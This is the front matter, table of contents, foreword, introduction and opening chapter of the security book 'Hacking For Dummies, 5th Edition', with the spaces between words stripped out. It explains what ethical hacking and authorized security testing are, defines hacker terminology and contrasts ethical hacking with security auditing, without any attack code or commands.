Download - Hacking For Dummies - Kevin Beaver
HackingForDummies,®5thEdition
Publishedby:JohnWiley&Sons,Inc.,111RiverStreet,Hoboken,NJ07030-5774,www.wiley.com
Copyright©2016byJohnWiley&Sons,Inc.,Hoboken,NewJersey
PublishedsimultaneouslyinCanada
Nopartofthispublicationmaybereproduced,storedinaretrievalsystemortransmittedinanyformorbyanymeans,electronic,mechanical,photocopying,recording,scanningorotherwise,exceptaspermittedunderSections107or108ofthe1976UnitedStatesCopyrightAct,withoutthepriorwrittenpermissionofthePublisher.RequeststothePublisherforpermissionshouldbeaddressedtothePermissionsDepartment,JohnWiley&Sons,Inc.,111RiverStreet,Hoboken,NJ07030,(201)748-6011,fax(201)748-6008,oronlineathttp://www.wiley.com/go/permissions.
Trademarks:Wiley,ForDummies,theDummiesManlogo,Dummies.com,MakingEverythingEasier,andrelatedtradedressaretrademarksorregisteredtrademarksofJohnWiley&Sons,Inc.andmaynotbeusedwithoutwrittenpermission.Allothertrademarksarethepropertyoftheirrespectiveowners.JohnWiley&Sons,Inc.isnotassociatedwithanyproductorvendormentionedinthisbook.
LIMITOFLIABILITY/DISCLAIMEROFWARRANTY:THEPUBLISHERANDTHEAUTHORMAKENOREPRESENTATIONSORWARRANTIESWITHRESPECTTOTHEACCURACYORCOMPLETENESSOFTHECONTENTSOFTHISWORKANDSPECIFICALLYDISCLAIMALLWARRANTIES,INCLUDINGWITHOUTLIMITATIONWARRANTIESOFFITNESSFORAPARTICULARPURPOSE.NOWARRANTYMAYBECREATEDOREXTENDEDBYSALESORPROMOTIONALMATERIALS.THEADVICEANDSTRATEGIESCONTAINEDHEREINMAYNOTBESUITABLEFOREVERYSITUATION.THISWORKISSOLDWITHTHEUNDERSTANDINGTHATTHEPUBLISHERISNOTENGAGEDINRENDERINGLEGAL,ACCOUNTING,OROTHERPROFESSIONALSERVICES.IFPROFESSIONALASSISTANCEISREQUIRED,THESERVICESOFACOMPETENTPROFESSIONALPERSONSHOULDBESOUGHT.NEITHERTHEPUBLISHERNORTHEAUTHORSHALLBELIABLEFORDAMAGESARISINGHEREFROM.THEFACTTHATANORGANIZATIONORWEBSITEISREFERREDTOINTHISWORKASACITATIONAND/ORAPOTENTIALSOURCEOFFURTHERINFORMATIONDOESNOTMEANTHATTHEAUTHORORTHEPUBLISHERENDORSESTHEINFORMATIONTHEORGANIZATIONORWEBSITEMAYPROVIDEORRECOMMENDATIONSITMAYMAKE.FURTHER,READERSSHOULDBEAWARETHATINTERNETWEBSITESLISTEDINTHISWORKMAYHAVECHANGEDORDISAPPEAREDBETWEENWHENTHISWORKWASWRITTENANDWHENITISREAD.
Forgeneralinformationonourotherproductsandservices,pleasecontactourCustomerCareDepartmentwithintheU.S.at877-762-2974,outsidetheU.S.at317-572-3993,orfax317-572-4002.Fortechnicalsupport,pleasevisitwww.wiley.com/techsupport.
Wileypublishesinavarietyofprintandelectronicformatsandbyprint-on-demand.Somematerialincludedwithstandardprintversionsofthisbookmaynotbeincludedine-booksorinprint-on-demand.IfthisbookreferstomediasuchasaCDorDVDthatisnotincludedintheversionyoupurchased,youmaydownloadthismaterialathttp://booksupport.wiley.com.FormoreinformationaboutWileyproducts,visitwww.wiley.com.
LibraryofCongressControlNumber:2015956627
ISBN978-1-119-15468-6(pbk);ISBN978-1-119-15469-3(ebk);ISBN978-1-119-15470-9(ebk)
HackingForDummies®Visitwww.dummies.com/cheatsheet/hackingtoviewthisbook’scheatsheet.
TableofContentsCoverForewordIntroduction
WhoShouldReadThisBook?
AboutThisBook
HowtoUseThisBook
WhatYouDon’tNeedtoRead
FoolishAssumptions
HowThisBookIsOrganized
IconsUsedinThisBook
WheretoGofromHere
PartI:BuildingtheFoundationforSecurityTestingChapter1:IntroductiontoEthicalHacking
StraighteningOuttheTerminology
RecognizingHowMaliciousAttackersBegetEthicalHackers
UnderstandingtheNeedtoHackYourOwnSystems
UnderstandingtheDangersYourSystemsFace
ObeyingtheEthicalHackingPrinciples
UsingtheEthicalHackingProcess
Chapter2:CrackingtheHackerMindsetWhatYou’reUpAgainst
WhoBreaksintoComputerSystems
WhyTheyDoIt
PlanningandPerformingAttacks
MaintainingAnonymity
Chapter3:DevelopingYourEthicalHackingPlanEstablishingYourGoals
DeterminingWhichSystemstoHack
CreatingTestingStandards
SelectingSecurityAssessmentTools
Chapter4:HackingMethodology
SettingtheStageforTesting
SeeingWhatOthersSee
ScanningSystems
DeterminingWhat’sRunningonOpenPorts
AssessingVulnerabilities
PenetratingtheSystem
PartII:PuttingSecurityTestinginMotionChapter5:InformationGathering
GatheringPublicInformation
MappingtheNetwork
Chapter6:SocialEngineeringIntroducingSocialEngineering
StartingYourSocialEngineeringTests
WhyAttackersUseSocialEngineering
UnderstandingtheImplications
PerformingSocialEngineeringAttacks
SocialEngineeringCountermeasures
Chapter7:PhysicalSecurityIdentifyingBasicPhysicalSecurityVulnerabilities
PinpointingPhysicalVulnerabilitiesinYourOffice
Chapter8:PasswordsUnderstandingPasswordVulnerabilities
CrackingPasswords
GeneralPasswordCrackingCountermeasures
SecuringOperatingSystems
PartIII:HackingNetworkHostsChapter9:NetworkInfrastructureSystems
UnderstandingNetworkInfrastructureVulnerabilities
ChoosingTools
Scanning,Poking,andProddingtheNetwork
DetectingCommonRouter,Switch,andFirewallWeaknesses
PuttingUpGeneralNetworkDefenses
Chapter10:WirelessNetworksUnderstandingtheImplicationsofWirelessNetworkVulnerabilities
ChoosingYourTools
DiscoveringWirelessNetworks
DiscoveringWirelessNetworkAttacksandTakingCountermeasures
Chapter11:MobileDevicesSizingUpMobileVulnerabilities
CrackingLaptopPasswords
CrackingPhonesandTablets
PartIV:HackingOperatingSystemsChapter12:Windows
IntroducingWindowsVulnerabilities
ChoosingTools
GatheringInformationAboutYourWindowsVulnerabilities
DetectingNullSessions
CheckingSharePermissions
ExploitingMissingPatches
RunningAuthenticatedScans
Chapter13:LinuxUnderstandingLinuxVulnerabilities
ChoosingTools
GatheringInformationAboutYourLinuxVulnerabilities
FindingUnneededandUnsecuredServices
Securingthe.rhostsandhosts.equivFiles
AssessingtheSecurityofNFS
CheckingFilePermissions
FindingBufferOverflowVulnerabilities
CheckingPhysicalSecurity
PerformingGeneralSecurityTests
PatchingLinux
PartV:HackingApplicationsChapter14:CommunicationandMessagingSystems
IntroducingMessagingSystemVulnerabilities
RecognizingandCounteringE-MailAttacks
UnderstandingVoiceoverIP
Chapter15:WebApplicationsandMobileAppsChoosingYourWebSecurityTestingTools
SeekingOutWebVulnerabilities
MinimizingWebSecurityRisks
UncoveringMobileAppFlaws
Chapter16:DatabasesandStorageSystemsDivingIntoDatabases
FollowingBestPracticesforMinimizingDatabaseSecurityRisks
OpeningUpAboutStorageSystems
FollowingBestPracticesforMinimizingStorageSecurityRisks
PartVI:SecurityTestingAftermath
Chapter17:ReportingYourResultsPullingtheResultsTogether
PrioritizingVulnerabilities
CreatingReports
Chapter18:PluggingSecurityHolesTurningYourReportsintoAction
PatchingforPerfection
HardeningYourSystems
AssessingYourSecurityInfrastructure
Chapter19:ManagingSecurityProcessesAutomatingtheEthicalHackingProcess
MonitoringMaliciousUse
OutsourcingSecurityAssessments
InstillingaSecurity-AwareMindset
KeepingUpwithOtherSecurityEfforts
PartVII:ThePartofTensChapter20:TenTipsforGettingSecurityBuy-In
CultivateanAllyandaSponsor
Don’tBeaFUDdyDuddy
DemonstrateHowtheOrganizationCan’tAffordtoBeHacked
OutlinetheGeneralBenefitsofSecurityTesting
ShowHowSecurityTestingSpecificallyHelpstheOrganization
GetInvolvedintheBusiness
EstablishYourCredibility
SpeakonManagement’sLevel
ShowValueinYourEfforts
BeFlexibleandAdaptable
Chapter21:TenReasonsHackingIstheOnlyEffectiveWaytoTest
TheBadGuysThinkBadThoughts,UseGoodTools,andDevelopNewMethods
ITGovernanceandComplianceAreMorethanHigh-LevelChecklistAudits
HackingComplementsAuditsandSecurityEvaluations
CustomersandPartnersWillAsk,‘HowSecureAreYourSystems?’
TheLawofAveragesWorksAgainstBusinesses
SecurityAssessmentsImprovetheUnderstandingofBusinessThreats
IfaBreachOccurs,YouHaveSomethingtoFallBackOn
In-DepthTestingBringsOuttheWorstinYourSystems
CombiningtheBestofPenetrationTestingandVulnerabilityAssessmentsIsWhatYouNeed
ProperTestingCanUncoverWeaknessesThatMightGoOverlookedforYears
Chapter22:TenDeadlyMistakesNotGettingPriorApproval
AssumingYouCanFindAllVulnerabilitiesDuringYourTests
AssumingYouCanEliminateAllSecurityVulnerabilities
PerformingTestsOnlyOnce
ThinkingYouKnowItAll
RunningYourTestsWithoutLookingatThingsfromaHacker’sViewpoint
NotTestingtheRightSystems
NotUsingtheRightTools
PoundingProductionSystemsattheWrongTime
OutsourcingTestingandNotStayingInvolved
Appendix:ToolsandResourcesAdvancedMalware
Bluetooth
Certifications
Databases
DenialofServiceProtection
Exploits
GeneralResearchTools
HackerStuff
Keyloggers
LawsandRegulations
Linux
LiveToolkits
LogAnalysis
Messaging
Miscellaneous
Mobile
Networks
PasswordCracking
PatchManagement
SecurityEducationandLearningResources
SecurityMethodsandModels
SocialEngineringandPhishing
SourceCodeAnalysis
Statistics
Storage
SystemHardening
UserAwarenessandTraining
VoiceoverIP
VulnerabilityDatabases
WebsitesandApplications
Windows
WirelessNetworks
AbouttheAuthorCheatSheetConnectwithDummiesEndUserLicenseAgreement
ForewordTherewerenobooksonhackingwhenIbecameapenetrationtesterandsecurityauditorforPricewaterhouseCoopersin1995.Thereweretools,techniques,andprocedures,though.Whilethetoolshavechangeddramatically,thetechniquesandprocedureshavebeenremarkablystable,andKevinBeaverhascreatedtheperfectintroductiontohackingthatincorporatesthebestprocedureswiththelatesttools.Planning,footprintanalysis,scanning,andattackingareallstillrequired.Perhapsthereismoreemphasisonwirelessandwebhackingandlessonthingssuchaswardialingthankstochangesinthewaycompaniesandpeopleareconnected.Therealvaluetoextractfromthisbookisinunderstandingthetoolsandbecomingproficientintheiruse.
Pentesting,orhacking,isthebestwaytogetintotherewardingfieldofITsecurity.Itisopentoanyonewithafoundationincomputing,coding,ornetworking.Ifyoudonothaveabackgroundinallthree,youwillquicklygainknowledgeintheotherdisciplinesbecausehackingtakesyoudownmanypaths.
Therewasatimewhenaprofessionalhackerhadtobeajack-of-all-trades.Nowtherearethousandsofsubspecialtieswithintherealmofhacking:mobileappsecuritytesting,webappsecuritytesting,networkpenetration,andOS-specifichackingforMacOSX,Windows,Linux,andAndroid.Securityresearchers,specialistswhodiscovernewvulnerabilities,arehavingabigimpactontheso-calledInternetofThings(IoT)astheydiscovernewwaystohackmedicaldevices,automobiles,airplanes,andindustrialcontrolsystems,whichmakesthisfieldthatmuchmoreexcitingandrelevant.
Hackingappealstoaspecialkindofperson.Tinkerers,inventors,andjustthosewhoarefascinatedbythewaythingsworkgetintoITsecuritythroughthehackingdoor.
AsKevinexplainsthough,hackingasaprofessionrequiresdisciplineandcarefulrecordkeeping,perhapsthehardestpartforthesometimesbrilliantamateurhackers—theoneswhowillstaygluedtotheirconsolesfor24hours,scriptingattacksandwendingtheirwaythroughanetworkuntiltheyhitgold.
Forme,themostinterestingtypeofhackingiswhatIhavetermedbusinessprocesshacking.Whenformalized,businessprocesshackingisanexampleofwhatKevincallsknowledge-basedhacking.Itisbestperformedwithaninsider’sknowledgeofarchitecturesandtechnologyand,mostimportant,thebusinessprocess.Thisiswhereyoudiscoverflawsinthewayabusinessisbuilt.Isthereathird-partypaymentprocessorintheloopofane-commercesite?Canasubscribertoaninformationresourceabusehisaccessinwaysahackercannot?Wherearethe“trustinterfaces?”Istheonlycontrolatthoseinterfaces:“Wetrusttheuser/system/suppliernottohackus?”
Youseebusinessprocesshackingeveryday.So-calledSearchEngineOptimization(SEO)expertsfigureouthowtohackGoogle’spagerankalgorithmsandcontrols.Ticketstopopularconcertsandsportingeventsaresoldoutinminutestobotsthatscarf
themupforresaleataprofit.Amazonsalesranksarehackedbyauthorswhopurchasetheirownbooksinquantity.
ThisbookisyourintroductiontothechallengingandengagingworldofhackingITsystems.Ipredictthreethings:1.Hackingwillaccelerateyourcareerasyougaininvaluableexperienceandbecomeindispensabletoyourorganization.2.Newdoorswillopenforyou.Youwillfindthatyouhavemanyoptions.Youcanjoin(orform)aconsultingfirm.Youcanmoveuptheranksinsideyourorganization,perhapstobecomingtheChiefInformationSecurityOfficer.Youcanjoinavendorthatdesignsandsellssecuritytoolsinwhichyouhavegainedproficiency.3.Youwillneverstoplearning.Hackingisoneofthefewfieldswhereyouareneverdone.
RichardStiennonChiefResearchAnalyst,IT-HarvestAuthorofThereWillBeCyberwar
IntroductionWelcometoHackingForDummies,5thEdition.Thisbookoutlines—inplainEnglish—computerhackertricksandtechniquesthatyoucanusetoassessthesecurityofyourinformationsystems,findthevulnerabilitiesthatmatter,andfixtheweaknessesbeforecriminalhackersandmaliciousinsiderstakeadvantageofthem.Thishackingistheprofessional,aboveboard,andlegaltypeofsecuritytesting—whichIoftenrefertoasethicalhackingthroughoutthebook.
Computerandnetworksecurityisacomplexsubjectandanever-movingtarget.Youmuststayontopofittoensurethatyourinformationisprotectedfromthebadguys.That’swherethetechniquesandtoolsoutlinedinthisbookcanhelp.
Youcanimplementallthesecuritytechnologiesandotherbestpracticespossible,andyourinformationsystemsmightbesecure—asfarasyouknow.However,untilyouunderstandhowmaliciousattackersthink,applythatknowledge,andusetherighttoolstoassessyoursystemsfromtheirpointofview,it’spracticallyimpossibletohaveatruesenseofhowsecureyourinformationreallyis.
Ethicalhacking,ormoresimply,“securityassessments”—whichencompassesformalandmethodicalpenetrationtesting,whitehathacking,andvulnerabilitytesting—isnecessarytofindsecurityflawsandtohelpvalidatethatyourinformationsystemsaretrulysecureonanongoingbasis.Thisbookprovidesyouwiththeknowledgetoimplementasecurityassessmentprogramsuccessfully,performpropersecuritychecks,andputthepropercountermeasuresinplacetokeepexternalhackersandmalicioususersincheck.
WhoShouldReadThisBook?
Disclaimer:Ifyouchoosetousetheinformationinthisbooktohackorbreakintocomputersystemsmaliciouslyandwithoutauthorization,you’reonyourown.NeitherI(theauthor)noranyoneelseassociatedwiththisbookshallbeliableorresponsibleforanyunethicalorcriminalchoicesthatyoumightmakeandexecuteusingthemethodologiesandtoolsthatIdescribe.Thisbookisintendedsolelyforinformationtechnology(IT)andinformationsecurityprofessionalstotestinformationsecurity—eitheronyourownsystemsoronaclient’ssystems—inanauthorizedfashion.
Okay,nowthatthat’soutoftheway,it’stimeforthegoodstuff!Thisbookisforyouifyou’reanetworkadministrator,informationsecuritymanager,securityconsultant,securityauditor,compliancemanager,orotherwiseinterestedinfindingoutmoreabouttestingcomputersystemsandIToperationstomakethingsmoresecure.
Asthepersonperformingwell-intendedinformationsecurityassessments,youcandetectandpointoutsecurityholesthatmightotherwisebeoverlooked.Ifyou’reperformingthesetestsonyoursystems,theinformationyouuncoverinyourtestscanhelpyouwinovermanagementandprovethatinformationsecurityreallyisabusinessissuetobetakenseriously.Likewise,ifyou’reperformingthesetestsforyourclients,youcanhelpfindsecurityholesthatcanbepluggedbeforethebadguyshaveachancetoexploitthem.
Theinformationinthisbookhelpsyoustayontopofthesecuritygameandenjoythefameandgloryofhelpingyourorganizationandclientspreventbadthingsfromhappeningtotheirinformationandnetworkenvironment.
AboutThisBookHackingForDummies,5thEdition,isareferenceguideonhackingyoursystemstoimprovesecurityandhelpminimizebusinessrisks.Thesecuritytestingtechniquesarebasedonwrittenandunwrittenrulesofcomputersystempenetrationtesting,vulnerabilitytesting,andinformationsecuritybestpractices.Thisbookcoverseverythingfromestablishingyourhackingplantotestingyoursystemstopluggingtheholesandmanaginganongoingsecuritytestingprogram.Realistically,formanynetworks,operatingsystems,andapplications,thousandsofpossiblehacksexist.Idon’tcoverthemallbutIdocoverthemajoronesonvariousplatformsandsystemsthatIbelievecontributetothemostsecurityproblemsinbusinesstoday.Whetheryouneedtoassesssecurityvulnerabilitiesonasmallhomeofficenetwork,amedium-sizedcorporatenetwork,oracrosslargeenterprisesystems,HackingForDummies,5thEdition,providestheinformationyouneed.
HowtoUseThisBookThisbookincludesthefollowingfeatures:
VarioustechnicalandnontechnicaltestsandtheirdetailedmethodologiesSpecificcountermeasurestoprotectagainsthacking
Beforeyoustarttestingyoursystems,familiarizeyourselfwiththeinformationinPartIsoyou’repreparedforthetasksathand.Theadage“ifyoufailtoplan,youplantofail”ringstruefortheethicalhackingprocess.Youmusthaveasolidgameplaninplaceifyou’regoingtobesuccessful.
WhatYouDon’tNeedtoReadDependingonyourcomputerandnetworkconfigurations,youmaybeabletoskipchapters.Forexample,ifyouaren’trunningLinuxorwirelessnetworks,youcanskipthosechapters.Justbecareful.Youmaythinkyou’renotrunningcertainsystems,buttheycouldverywellbeonyournetwork,somewhere,waitingtobeexploited.
FoolishAssumptionsImakeafewassumptionsaboutyou,theaspiringITorsecurityprofessional:
Youarefamiliarwithbasiccomputer-,network-,andinformation-securityconceptsandterms.Youhaveaccesstoacomputerandanetworkonwhichtousethesetechniquesandtools.Youhavepermissiontoperformthehackingtechniquesdescribedinthisbook.
HowThisBookIsOrganizedThisbookisorganizedintosevenmodularparts,soyoucanjumparoundfromoneparttoanotherasneeded.Eachchapterprovidespracticalmethodologiesandpracticesyoucanuseaspartofyoursecuritytestingefforts,includingchecklistsandreferencestospecifictoolsyoucanuse,aswellasresourcesontheInternet.
PartI:BuildingtheFoundationforSecurityTestingThispartcoversthefundamentalaspectsofsecurityassessments.Itstartswithanoverviewofthevalueofethicalhackingandwhatyoushouldandshouldn’tdoduringtheprocess.Yougetinsidethemaliciousmindsetanddiscoverhowtoplanyoursecuritytestingefforts.Thispartcoversthestepsinvolvedintheethicalhackingprocess,includinghowtochoosethepropertools.
PartII:PuttingSecurityTestinginMotionThispartgetsyourollingwiththesecuritytestingprocess.Itcoversseveralwell-knownandwidelyusedhackattacks,includinginformationgathering,socialengineering,andcrackingpasswords,togetyourfeetwet.Thispartcoversthehumanandphysicalelementsofsecurity,whichtendtobetheweakestlinksinanyinformationsecurityprogram.Afteryouplungeintothesetopics,you’llknowthetipsandtricksrequiredtoperformcommongeneralsecuritytestsagainstyoursystems,aswellasspecificcountermeasurestokeepyourinformationsystemssecure.
PartIII:HackingNetworkHostsStartingwiththelargernetworkinmind,thispartcoversmethodstotestyoursystemsforvariouswell-knownnetworkinfrastructurevulnerabilities.FromweaknessesintheTCP/IPprotocolsuitetowirelessnetworkinsecurities,youfindouthownetworksarecompromisedbyusingspecificmethodsofflawednetworkcommunications,alongwithvariouscountermeasuresthatyoucanimplementtoavoidbecomingavictim.Ithendelvedownintomobiledevicesandshowhowsmartphones,tablets,andthelikecanbeexploited.
PartIV:HackingOperatingSystemsPracticallyalloperatingsystemshavewell-knownvulnerabilitiesthathackersoftenexploit.Thispartjumpsintohackingthewidely-usedoperatingsystems:WindowsandLinux.Thehackingmethodsincludescanningyouroperatingsystemsforvulnerabilitiesandenumeratingthespecifichoststogaindetailedinformation.Thispartalsoincludesinformationonexploitingwell-knownvulnerabilitiesintheseoperatingsystems,takingoveroperatingsystemsremotely,andspecificcountermeasuresthatyoucanimplementtomakeyouroperatingsystemsmoresecure.
PartV:HackingApplicationsApplicationsecurityisacriticalareaoffocusthesedays.Anincreasingnumberofattacks—whichareoftenabletobypassfirewalls,intrusionpreventionsystems,andantivirussoftware—areaimeddirectlyatweb,mobile,andrelatedapplications.Thispartdiscusseshackingspecificbusinessapplications,includingcoverageofmessagingsystems,webapplications,mobileapps,anddatabases,alongwithpracticalcountermeasuresthatyoucanputinplacetomakeyoursystemsmoresecure.
PartVI:SecurityTestingAftermathAfteryouperformyoursecuritytesting,whatdoyoudowiththeinformationyougather?Shelveit?Showitoff?Howdoyoumoveforward?Thispartanswersthesequestionsandmore.Fromdevelopingreportsformanagementtoremediatingthesecurityflawsthatyoudiscovertoestablishingproceduresforyourongoingvulnerabilitytestingefforts,thispartbringsthesecurityassessmentprocessfullcircle.Thisinformationnotonlyensuresthatyoureffortandtimearewellspent,butalsoisevidencethatinformationsecurityisanessentialelementforsuccessinanybusinessthatdependsoncomputersandinformationtechnology.
PartVII:ThePartofTensThispartcontainstipstohelpensurethesuccessofyourinformationsecurityprogram.Youfindouthowtogetmanagementtobuyintoyourprogramsoyoucangetgoingandstartprotectingyoursystems.Thispartalsoincludesthetoptenethicalhackingmistakesyouabsolutelymustavoid.
Theappendix,whichalsoappearsinthispart,providesaone-stopreferencelistingofethicalhackingtoolsandresources.
IconsUsedinThisBook
Thisiconpointsoutinformationthatisworthcommittingtomemory.
Thisiconpointsoutinformationthatcouldhaveanegativeimpactonyourethicalhackingefforts—sopleasereadit!
Thisiconreferstoadvicethatcanhelphighlightorclarifyanimportantpoint.
Thisiconpointsouttechnicalinformationthatisinterestingbutnotvitaltoyourunderstandingofthetopicbeingdiscussed.
WheretoGofromHereThemoreyouknowabouthowexternalhackersandrogueinsidersworkandhowyoursystemsshouldbetested,thebetteryou’reabletosecureyourcomputerandnetworksystems.Thisbookprovidesthefoundationthatyouneedtodevelopandmaintainasuccessfulsecurityassessmentprograminordertominimizebusinessrisks.
Keepinmindthatthehigh-levelconceptsofsecuritytestingwon’tchangeasoftenasthespecificvulnerabilitiesyouprotectagainst.Ethicalhackingwillalwaysremainbothanartandascienceinafieldthat’sever-changing.Youmustkeepupwiththelatesthardwareandsoftwaretechnologies,alongwiththevariousvulnerabilitiesthatcomeaboutmonthaftermonthandyearafteryear.
Youwon’tfindasinglebestwaytohackyoursystems,sotweakthisinformationtoyourheart’scontentand,asI’vealwayssaid,happyhacking!
BuildingtheFoundationforSecurityTesting
ForDummiescanhelpyougetstartedwithlotsofsubjects.Visitwww.dummies.comforgreatDummiescontentonline.
Inthispart…Yourmissionistofindtheholesinyournetworksoyoucanfixthembeforethebadguysexploitthem.It’sthatsimple.Thismissionwillbefun,educational,andmostlikelyentertaining.Itwillcertainlybeaneye-openingexperience.Thecoolpartisthatyoucanemergeasthehero,knowingthatyourorganizationwillbebetterprotectedagainstmalicioushackersandinsiderattacksandlesslikelytoexperienceabreachandhaveitsnamesmearedacrosstheheadlines.
Ifyou’renewtosecuritytesting,thisistheplacetobegin.Thechaptersinthispartgetyoustartedwithinformationonwhattodoandhowtodoitwhenyou’rehackingyourownsystems.Oh,andyoufindoutwhatnottodoaswell.Thisinformationwillguideyouthroughbuildingthefoundationforyoursecuritytestingprogram.Thisfoundationwillkeepyouontherightpathandoffanyone-waydead-endstreets.Thismissionisindeedpossible—youjusthavetogetyourducksinarowfirst.
IntroductiontoEthicalHackingInThisChapter
Understandinghackers’andmalicioususers’objectives
Examininghowtheethicalhackingprocesscameabout
Understandingthedangersyourcomputersystemsface
Startingtousetheethicalhackingprocessforsecuritytesting
Thisbookisabouttestingyourcomputersandnetworksforsecurityvulnerabilitiesandpluggingtheholesyoufindbeforethebadguysgetachancetoexploitthem.
StraighteningOuttheTerminologyMostpeoplehaveheardofhackersandmalicioususers.Manyhaveevensufferedtheconsequencesoftheircriminalactions.Sowhoarethesepeople?Andwhydoyouneedtoknowaboutthem?Thenextfewsectionsgiveyouthelowdownontheseattackers.
Inthisbook,Iusethefollowingterminology:
Hackers(orexternalattackers)trytocompromisecomputers,sensitiveinformation,andevenentirenetworksforill-gottengains—usuallyfromtheoutside—asunauthorizedusers.Hackersgoforalmostanysystemtheythinktheycancompromise.Somepreferprestigious,well-protectedsystems,buthackingintoanyone’ssystemincreasesanattacker’sstatusinhackercircles.
Malicioususers(orinternalattackers)trytocompromisecomputersandsensitiveinformationfromtheinsideasauthorizedand“trusted”users.Malicioususersgoforsystemstheybelievetheycancompromiseforill-gottengainsorrevenge.
Maliciousattackersare,generallyspeaking,bothhackersandmalicioususers.Forthesakeofsimplicity,IrefertobothashackersandspecifyhackerormalicioususeronlywhenIneedtodifferentiateanddrilldownfurtherintotheiruniquetools,techniques,andwaysofthinking.
Ethicalhackers(orgoodguys)hacksystemstodiscovervulnerabilitiestoprotectagainstunauthorizedaccess,abuse,andmisuse.Informationsecurityresearchers,consultants,andinternalstafffallintothiscategory.
DefininghackerHackerhastwomeanings:
Traditionally,hackersliketotinkerwithsoftwareorelectronicsystems.Hackersenjoyexploringandlearninghowcomputersystemsoperate.Theylovediscoveringnewwaystowork—bothmechanicallyandelectronically.Inrecentyears,hackerhastakenonanewmeaning—someonewhomaliciouslybreaksintosystemsforpersonalgain.Technically,thesecriminalsarecrackers(criminalhackers).Crackersbreakinto,orcrack,systemswithmaliciousintent.Thegaintheyseekcouldbefame,intellectualproperty,profit,orevenrevenge.Theymodify,delete,andstealcriticalinformationaswellastakeentirenetworksoffline,oftenbringinglargecorporationsandgovernmentagenciestotheirknees.
Thegood-guy(whitehat)hackersdon’tlikebeinglumpedinthesamecategoryasthebad-guy(blackhat)hackers.(Incaseyou’recurious,thewhitehatandblackhattermscomefromoldWesternTVshowsinwhichthegoodguysworewhitecowboyhatsandthebadguysworeblackcowboyhats.)Grayhathackersarealittlebitofboth.
Whateverthecase,mostpeoplehaveanegativeconnotationofthewordhacker.
Manymalicioushackersclaimthattheydon’tcausedamagebutinsteadhelpothersforthe“greatergood”ofsociety.Yeah,right.Malicioushackersareelectronicmiscreantsanddeservetheconsequencesoftheiractions.
Becarefulnottoconfusecriminalhackerswithsecurityresearchers.Researchersnotonlyhackaboveboardanddeveloptheamazingtoolsthatwegettouseinourwork,butalsothey(usually)takeresponsiblestepstodisclosetheirfindingsandpublishtheircode.
DefiningmalicioususerMalicioususer—meaningarogueemployee,contractor,intern,orotheruserwhoabuseshisorhertrustedprivileges—isacommonterminsecuritycirclesandinheadlinesaboutinformationbreaches.Theissueisn’tnecessarilyusers“hacking”internalsystems,butratheruserswhoabusethecomputeraccessprivilegesthey’vebeengiven.Usersferretthroughcriticaldatabasesystemstogleansensitiveinformation,e-mailconfidentialclientinformationtothecompetitionorelsewheretothecloud,ordeletesensitivefilesfromserversthattheyprobablydidn’tneedtohaveaccesstointhefirstplace.There’salsotheoccasionalignorantinsiderwhoseintentisnotmaliciousbutwhostillcausessecurityproblemsbymoving,deleting,orcorruptingsensitiveinformation.Evenaninnocent“fat-finger”onthekeyboardcanhavedireconsequencesinthebusinessworld.
MalicioususersareoftentheworstenemiesofITandinformationsecurityprofessionalsbecausetheyknowexactlywheretogotogetthegoodsanddon’tneedtobecomputersavvytocompromisesensitiveinformation.Theseusershavetheaccesstheyneedandthemanagementtruststhem—oftenwithoutquestion.
So,whataboutthatEdwardSnowdenguy—theformerNationalSecurityAgencyemployeewhorattedouthisownemployer?That’sacomplicatedsubjectandItalkabouthackermotivationsinChapter2.RegardlessofwhatyouthinkofSnowden,heabusedhisauthorityandviolatedthetermsofhisnon-disclosureagreement.
RecognizingHowMaliciousAttackersBegetEthicalHackers
Youneedprotectionfromhackershenanigans;youhavetobecomeassavvyastheguystryingtoattackyoursystems.Atruesecurityassessmentprofessionalpossessestheskills,mindset,andtoolsofahackerbutisalsotrustworthy.Heorsheperformsthehacksassecuritytestsagainstsystemsbasedonhowhackersmightwork.
Ethicalhacking—whichencompassesformalandmethodicalpenetrationtesting,whitehathacking,andvulnerabilitytesting—involvesthesametools,tricks,andtechniquesthatcriminalhackersuse,butwithonemajordifference:Ethicalhackingisperformedwiththetarget’spermissioninaprofessionalsetting.Theintentofethicalhackingistodiscovervulnerabilitiesfromamaliciousattacker’sviewpointtobettersecuresystems.Ethicalhackingispartofanoverallinformationriskmanagementprogramthatallowsforongoingsecurityimprovements.Ethicalhackingcanalsoensurethatvendors’claimsaboutthesecurityoftheirproductsarelegitimate.
Ifyouperformethicalhackingtestsandwanttoaddanothercertificationtoyourcredentials,youmightwanttoconsiderbecomingaCertifiedEthicalHacker(C|EH)throughacertificationprogramsponsoredbyEC-Council.Seewww.eccouncil.orgformoreinformation.LiketheCertifiedInformationSystemsSecurityProfessional(CISSP),theC|EHcertificationhasbecomeawell-knownandrespectedcertificationintheindustry.It’sevenaccreditedbytheAmericanNationalStandardsInstitute(ANSI17024).OtheroptionsincludetheSANSGlobalInformationAssuranceCertification(GIAC)programandtheOffensiveSecurityCertifiedProfessional(OSCP)program—acompletelyhands-onsecuritytestingcertification.Ilovethatapproachasalltoooften,peopleperformingthistypeofworkdon’thavetheproperhands-onexperiencetodoitwell.Seewww.giac.organdwww.offensive-security.comformoreinformation.
EthicalhackingversusauditingManypeopleconfusesecuritytestingviatheethicalhackingapproachwithsecurityauditing,buttherearebigdifferences,namelyintheobjectives.Securityauditinginvolvescomparingacompany’ssecuritypolicies(orcompliancerequirements)towhat’sactuallytakingplace.Theintentofsecurityauditingistovalidatethatsecuritycontrolsexist—typicallyusingarisk-basedapproach.Auditingofteninvolvesreviewingbusinessprocessesand,inmanycases,mightnotbeverytechnical.Ioftenrefertosecurityauditsassecuritychecklistsbecausethey’reusuallybasedon(youguessedit)checklists.
Notallauditsarehigh-level,butmanyoftheonesI’veseen(especiallyaroundPCIDSS[PaymentCardIndustryDataSecurityStandard]compliance)arequitesimplistic—oftenperformedbypeoplewhohavenotechnicalcomputer,network,andapplicationexperienceor,worse,theyworkoutsideofITaltogether!
Conversely,securityassessmentsbasedaroundethicalhackingfocusonvulnerabilitiesthatcanbeexploited.Thistestingapproachvalidatesthatsecuritycontrolsdonotexistorareineffectualatbest.Ethicalhackingcanbebothhighlytechnicalandnontechnical,andalthoughyoudouseaformalmethodology,ittendstobeabitlessstructuredthanformalauditing.Whereauditingisrequired(suchasfortheISO9001and27001certifications)inyourorganization,youmightconsiderintegratingtheethicalhackingtechniquesIoutlineinthisbookintoyourIT/securityauditprogram.Theycomplementoneanotherreallywell.
